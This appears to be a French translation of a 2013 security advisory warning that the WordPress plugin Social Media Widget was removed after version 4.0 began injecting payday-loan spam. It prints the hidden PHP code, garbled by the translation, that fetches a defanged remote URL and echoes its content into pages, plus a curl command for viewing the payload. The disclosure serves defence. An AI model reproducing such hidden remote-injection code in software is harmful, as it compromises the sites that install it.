Si vous utilisez le plug-in Widget médias sociaux (social-media-widget), veillez à le retirer immédiatement de votre site web. Nous avons découvert qu’il est utilisé pour injecter le spam dans les sites Web et il a également été supprimé du référentiel Plugin WordPress .

Ceci est un plugin très populaire avec plus de 900.000 téléchargements. Il a le potentiel d’avoir un impact sur beaucoup de sites Web.

Screen Shot 09/04/2013 au 11/03/12 AM

Détails techniques

Le plugin a un appel caché menant à  l’adresse suivante: httx :/ / i.aaur.net / i.php, qui est utilisé pour injecter « Pay Day Loan » spam dans les sites Web exécutant le plugin. 

Le code malveillant a été ajouté il ya seulement 12 jours quand ils ont lancé la version 4.0 du plugin. Nous recommandons donc que tout le monde enlève ce plugin immédiatement avant que nous ayons plus d’informations. 

voici le code malveillant qui a été ajouté au plugin:

470 
471 $ smw_url = « hxxp :/ / i.aaur.net / i.php »; 
472 if {(function_exists (« smw_get »)!) 
fonction smw_get 473 ($ f) { 
réponse wp_remote_get = 474 $ ($ f) , 
475 cas (is_wp_error ($ response)) { 
476 smw_get_body fonction ($ f) { 
477 $ ch = @ curl_init (); 
478 @ curl_setopt ($ ch, CURLOPT_URL, $ f) 
@ 479 curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, vrai), 
480 $ @ output = curl_exec ($ ch); 
curl_close @ 481 ($ ch); 
482 return $ sortie; 
} 483 
484 écho smw_get_body ($ f); 
485} else { 
echo $ 486 response [‘corps’] , 
487} 
488} 
489 smw_get (smw_url $) 
490}

Le code lui-même est très simple. Vous pouvez voir où ils tirent l’url illicite sur la ligne 471. Le reste n’est que gestion des erreurs et d’incorporation de l’injection.

En fait, si vous voulez l’essayer en toute sécurité, il suffit d’ouvrir votre terminal convivial et lancez:

curl -D – hxxp://i.aaur.net/i.php

Vous obtiendrez quelque chose comme ceci:

Screen Shot 09/04/2013 au 29/10/13 AM

Vous pouvez clairement voir l’injection et en retour le SPAM injecté. Or, dans ce cas vous ne faites que voir  l’injection, mais une fois que cela est intégré dans votre site, il se cache parmi tous vos autres codes, ce qui rend difficile pour vous en tant que propriétaire du site à le trouver. 

http://blog.sucuri.net/2013/04/wordpress-plugin-social-media-widget.html